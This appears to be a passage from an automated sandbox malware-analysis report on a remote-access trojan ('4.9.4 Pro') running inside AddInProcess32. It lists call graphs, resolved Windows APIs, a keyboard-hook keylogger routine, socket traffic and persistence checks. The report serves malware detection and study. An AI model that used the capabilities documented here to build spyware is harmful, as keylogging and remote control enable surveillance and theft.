48508->48509 48510 404f91 48509->48510 48660 4052fd 28 API calls 48510->48660 48519 404a1b 48518->48519 48520 4048ee 48518->48520 48521 40497e 48519->48521 48522 404a21 WSAGetLastError 48519->48522 48520->48521 48523 404923 48520->48523 48526 40531e 28 API calls 48520->48526 48521->47782 48522->48521 48524 404a31 48522->48524 48665 420c60 27 API calls 48523->48665 48527 404932 48524->48527 48528 404a36 48524->48528 48530 40490f 48526->48530 48533 402093 28 API calls 48527->48533 48531 41cae1 30 API calls 48528->48531 48529 40492b 48529->48527 48532 404941 48529->48532 48534 402093 28 API calls 48530->48534 48535 404a40 48531->48535 48543 404950 48532->48543 48544 404987 48532->48544 48536 404a80 48533->48536 48537 40491e 48534->48537 48670 4052fd 28 API calls 48535->48670 48540 402093 28 API calls 48536->48540 48541 41b4ef 80 API calls 48537->48541 48545 404a8f 48540->48545 48541->48523 48548 402093 28 API calls 48543->48548 48667 421a40 54 API calls 48544->48667 48549 41b4ef 80 API calls 48545->48549 48552 40495f 48548->48552 48549->48521 48551 40498f 48554 4049c4 48551->48554 48555 404994 48551->48555 48556 402093 28 API calls 48552->48556 48669 420e06 28 API calls 48554->48669 48558 402093 28 API calls 48555->48558 48559 40496e 48556->48559 48561 4049a3 48558->48561 48562 41b4ef 80 API calls 48559->48562 48565 402093 28 API calls 48561->48565 48566 404973 48562->48566 48563 4049cc 48564 4049f9 CreateEventW CreateEventW 48563->48564 48567 402093 28 API calls 48563->48567 48564->48521 48568 4049b2 48565->48568 48666 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48566->48666 48569 4049e2 48567->48569 48570 41b4ef 80 API calls 48568->48570 48572 402093 28 API calls 48569->48572 48573 4049b7 48570->48573 48574 4049f1 48572->48574 48668 4210b2 52 API calls 48573->48668 48576 41b4ef 80 API calls 48574->48576 48577 4049f6 48576->48577 48577->48564 48671 41b7b6 GlobalMemoryStatusEx 48578->48671 48580 41b7f5 48580->47782 48672 414580 48581->48672 48585 40dda5 48584->48585 48586 4134ff 3 API calls 48585->48586 48588 40ddac 48586->48588 48587 40ddc4 48587->47782 48588->48587 48589 413549 3 API calls 48588->48589 48589->48587 48591 4020b7 28 API calls 48590->48591 48592 41bc57 48591->48592 48592->47782 48594 41bafc GetTickCount 48593->48594 48594->47782 48596 436e90 ___scrt_fastfail 48595->48596 48597 41bab5 GetForegroundWindow GetWindowTextW 48596->48597 48598 40417e 28 API calls 48597->48598 48599 41badf 48598->48599 48599->47782 48601 402093 28 API calls 48600->48601 48602 40f8f6 48601->48602 48602->47782 48604 4020df 11 API calls 48603->48604 48605 402f3d 48604->48605 48606 4032a0 28 API calls 48605->48606 48607 402f59 48606->48607 48607->47782 48609 404ab4 48608->48609 48702 40520c 48609->48702 48611 404ac9 ctype 48612 404b40 WaitForSingleObject 48611->48612 48613 404b20 48611->48613 48615 404b56 48612->48615 48614 404b32 send 48613->48614 48616 404b7b 48614->48616 48708 42103a 54 API calls 48615->48708 48618 401fd8 11 API calls 48616->48618 48620 404b83 48618->48620 48619 404b69 SetEvent 48619->48616 48621 401fd8 11 API calls 48620->48621 48622 404b8b 48621->48622 48622->47782 48624 4020df 11 API calls 48623->48624 48625 404c27 48624->48625 48626 4020df 11 API calls 48625->48626 48636 404c30 48626->48636 48627 43bd51 ___std_exception_copy 21 API calls 48627->48636 48629 4020b7 28 API calls 48629->48636 48630 404ca1 48632 404e26 99 API calls 48630->48632 48631 401fe2 28 API calls 48631->48636 48633 404ca8 48632->48633 48635 401fd8 11 API calls 48633->48635 48634 401fd8 11 API calls 48634->48636 48637 404cb1 48635->48637 48636->48627 48636->48629 48636->48630 48636->48631 48636->48634 48639 404c84 48636->48639 48727 404b96 48636->48727 48638 401fd8 11 API calls 48637->48638 48640 404cba 48638->48640 48733 404cc3 32 API calls 48639->48733 48640->47782 48643 404e40 SetEvent CloseHandle 48642->48643 48644 404e57 closesocket 48642->48644 48645 404ed8 48643->48645 48646 404e64 48644->48646 48645->47782 48647 404e7a 48646->48647 48735 4050e4 84 API calls 48646->48735 48648 404e8c WaitForSingleObject 48647->48648 48649 404ece SetEvent CloseHandle 48647->48649 48736 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48648->48736 48649->48645 48652 404e9b SetEvent WaitForSingleObject 48737 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48652->48737 48654 404eb3 SetEvent CloseHandle CloseHandle 48654->48649 48655->47782 48657->47782 48658->48484 48659->48502 48664 40515c 102 API calls 48661->48664 48663 405159 48664->48663 48665->48529 48666->48521 48667->48551 48668->48566 48669->48563 48671->48580 48675 414553 48672->48675 48676 414568 ___scrt_initialize_default_local_stdio_options 48675->48676 48679 43f79d 48676->48679 48682 43c4f0 48679->48682 48683 43c530 48682->48683 48684 43c518 48682->48684 48683->48684 48685 43c538 48683->48685 48697 4405dd 20 API calls __dosmaperr 48684->48697 48698 43a7b7 36 API calls 2 library calls 48685->48698 48688 43c548 48699 43cc76 20 API calls 2 library calls 48688->48699 48689 43c51d _strftime 48690 434fcb ___crtLCMapStringA 5 API calls 48689->48690 48692 414576 48690->48692 48692->47782 48693 43c5c0 48700 43d2e4 51 API calls 3 library calls 48693->48700 48696 43c5cb 48701 43cce0 20 API calls _free 48696->48701 48697->48689 48698->48688 48699->48693 48700->48696 48701->48689 48703 405214 48702->48703 48704 4023ce 11 API calls 48703->48704 48705 40521f 48704->48705 48709 405234 48705->48709 48707 40522e 48707->48611 48708->48619 48710 405240 48709->48710 48711 40526e 48709->48711 48725 4028e8 28 API calls 48710->48725 48726 4028a4 22 API calls 48711->48726 48715 40524a 48715->48707 48725->48715 48728 404ba0 WaitForSingleObject 48727->48728 48729 404bcd recv 48727->48729 48734 421076 54 API calls 48728->48734 48731 404be0 48729->48731 48731->48636 48732 404bbc SetEvent 48732->48731 48733->48636 48734->48732 48735->48647 48736->48652 48737->48654 48739->47847 48740->47873 48741->47872 48742->47861 48743->47865 48744->47871 48745->47903 48750 40f7c2 48748->48750 48749 413549 3 API calls 48749->48750 48750->48749 48751 40f866 48750->48751 48754 40f856 Sleep 48750->48754 48770 40f7f4 48750->48770 48753 40905c 28 API calls 48751->48753 48752 40905c 28 API calls 48752->48770 48756 40f871 48753->48756 48754->48750 48755 41bc5e 28 API calls 48755->48770 48758 41bc5e 28 API calls 48756->48758 48759 40f87d 48758->48759 48783 413814 14 API calls 48759->48783 48762 401f09 11 API calls 48762->48770 48763 40f890 48764 401f09 11 API calls 48763->48764 48766 40f89c 48764->48766 48765 402093 28 API calls 48765->48770 48767 402093 28 API calls 48766->48767 48768 40f8ad 48767->48768 48771 41376f 14 API calls 48768->48771 48769 41376f 14 API calls 48769->48770 48770->48752 48770->48754 48770->48755 48770->48762 48770->48765 48770->48769 48781 40d096 112 API calls ___scrt_fastfail 48770->48781 48782 413814 14 API calls 48770->48782 48772 40f8c0 48771->48772 48784 412850 TerminateProcess WaitForSingleObject 48772->48784 48774 40f8c8 ExitProcess 48785 4127ee 62 API calls 48780->48785 48782->48770 48783->48763 48784->48774 48786 40165e 48787 401666 48786->48787 48788 401669 48786->48788 48789 4016a8 48788->48789 48792 401696 48788->48792 48790 4344ea new 22 API calls 48789->48790 48791 40169c 48790->48791 48793 4344ea new 22 API calls 48792->48793 48793->48791

                                        Executed Functions

                                        Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                        • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                        • API String ID: 4236061018-3687161714
                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                        Function 0040A2B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1277 40a2b8-40a2cf 1278 40a2d1-40a2eb SetWindowsHookExA 1277->1278 1279 40a333-40a343 GetMessageA 1277->1279 1278->1279 1284 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1278->1284 1280 40a345-40a35d TranslateMessage DispatchMessageA 1279->1280 1281 40a35f 1279->1281 1280->1279 1280->1281 1282 40a361-40a366 1281->1282 1284->1282
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                        • DispatchMessageA.USER32(?), ref: 0040A355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                        • String ID: Keylogger initialization failure: error $`#v
                                        • API String ID: 3219506041-3226811161
                                        • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                        • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                        Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                          • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                          • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                                        • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                        • String ID: 4.9.4 Pro$override$pth_unenc
                                        • API String ID: 2281282204-930821335
                                        • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                        • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                        Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1427 404f51-404f5f 1428 404f65-404f6c 1427->1428 1429 404fea 1427->1429 1431 404f74-404f7b 1428->1431 1432 404f6e-404f72 1428->1432 1430 404fec-404ff1 1429->1430 1433 404fc0-404fe8 CreateEventA CreateThread 1431->1433 1434 404f7d-404fbb GetLocalTime call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1431->1434 1432->1433 1433->1430 1434->1433
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$EventLocalThreadTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 2532271599-1507639952
                                        • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                        • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                        Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                        • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventObjectSingleWaitrecv
                                        • String ID:
                                        • API String ID: 311754179-0
                                        • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                        • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                        • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                        • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                        Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Name$ComputerUser
                                        • String ID:
                                        • API String ID: 4229901323-0
                                        • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                        • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                        Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                        Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 48 40eef2-40ef03 call 401fd8 23->48 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 90 40ec13-40ec1a 79->90 91 40ec0c-40ec0e 79->91 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 92 40ec1c 90->92 93 40ec1e-40ec2a call 41b2c3 90->93 96 40eef1 91->96 92->93 103 40ec33-40ec37 93->103 104 40ec2c-40ec2e 93->104 96->48 98->79 124 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->124 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39 call 407716 103->108 104->103 129 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->129 130 40ec8b call 407755 107->130 118 40ec3e-40ec40 108->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->107 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 124->157 177 40ed80-40ed84 129->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 129->178 130->129 141->107 144 40ec69-40ec6f 141->144 144->107 147 40ec71 call 407260 144->147 147->107 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 202 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->202 233 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->233 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 192 40ee1e-40ee42 call 40247c call 434798 182->192 183->192 213 40ee51 192->213 214 40ee44-40ee4f call 436e90 192->214 202->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 213->217 214->217 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->271 286 40efc1 233->286 287 40efdc-40efde 233->287 271->233 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->233 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->96 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 368 40f1cc-40f1df call 401e65 call 401fab 356->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 426 40f2e4-40f2e7 416->426 418->416 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->124 445->124 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                        APIs
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
